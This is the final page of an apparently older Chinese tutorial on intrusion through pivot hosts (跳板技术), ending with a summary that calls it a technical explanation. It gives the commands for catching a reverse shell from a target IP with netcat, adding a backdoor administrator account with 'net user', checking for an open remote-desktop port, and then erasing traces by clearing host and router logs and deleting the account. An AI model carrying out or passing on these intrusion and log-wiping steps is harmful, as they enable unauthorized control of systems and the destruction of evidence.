在工作平台上再打开一个cmd，输入命令 

　nc 211.52.118.84 3306

即监听该ip的3306端口，返回一个目标主机的shell，获取该主机的控制权。

javascript:return big(this)" height=256 alt=获取主机控制权 src="/article/UploadPic/2008-8/200885214948227.jpg" width=454 onload="javascript:if(this.width>498)this.style.width=498;">

在该shell上输入命令建立管理员用户

net user test test /add net localgour administrators test /add

下面看看对方是否开了远程桌面连接，在命令行下敲入命令

netstat -ano

如图9所示，对方开了3389端口，即可以进行远程桌面的连接。

javascript:return big(this)" height=277 alt=查看目标主机端口开放情况 src="/article/UploadPic/2008-8/200885214948968.jpg" width=430 onload="javascript:if(this.width>498)this.style.width=498;">

由于对方是XP系统，不能多用户远程连接，笔者的入侵检测到此为止。

5、全身而退

入侵完成获得目标主机的管理权限，入侵者就得擦除痕迹，准备撤退了。

(1).由于从目标主机获得的shell反向连接获得的，不会有日志记录，所以不用管直接断开连接。

(2).上传clearlog工具，清除telnet主机上的登陆日志。

(3).输入exit，退出路由器到主机的的telnet连接。在路由器上输入

clear logging

分别用来清除登陆日志。

javascript:return big(this)" style="WIDTH: 498px" height=193 alt=清除登陆日志 src="/article/UploadPic/2008-8/200885214949545.jpg" width=500 onload="javascript:if(this.width>498)this.style.width=498;">

(4).退出路由器登陆，通过工具清除远程桌面主机上的登陆日志，然后删除登录用帐户和用户目录，注销用户。

总结：上面笔者结合实例演示了入侵者如何通过跳板进行入侵以及入侵善后的全过程，本文只是从技术的角度对跳板技术进行解析，目的是让有兴趣的读者直观地了解跳板技术的相关细节。当然，跳板技术是博大精深，远非本文所能囊括，但其基本原来都类似，希望文本对大家了解这种技术有所帮助。

上一页  [1] [2] 

查看更多与入侵检测三级跳 解析跳板技术(图)相关内容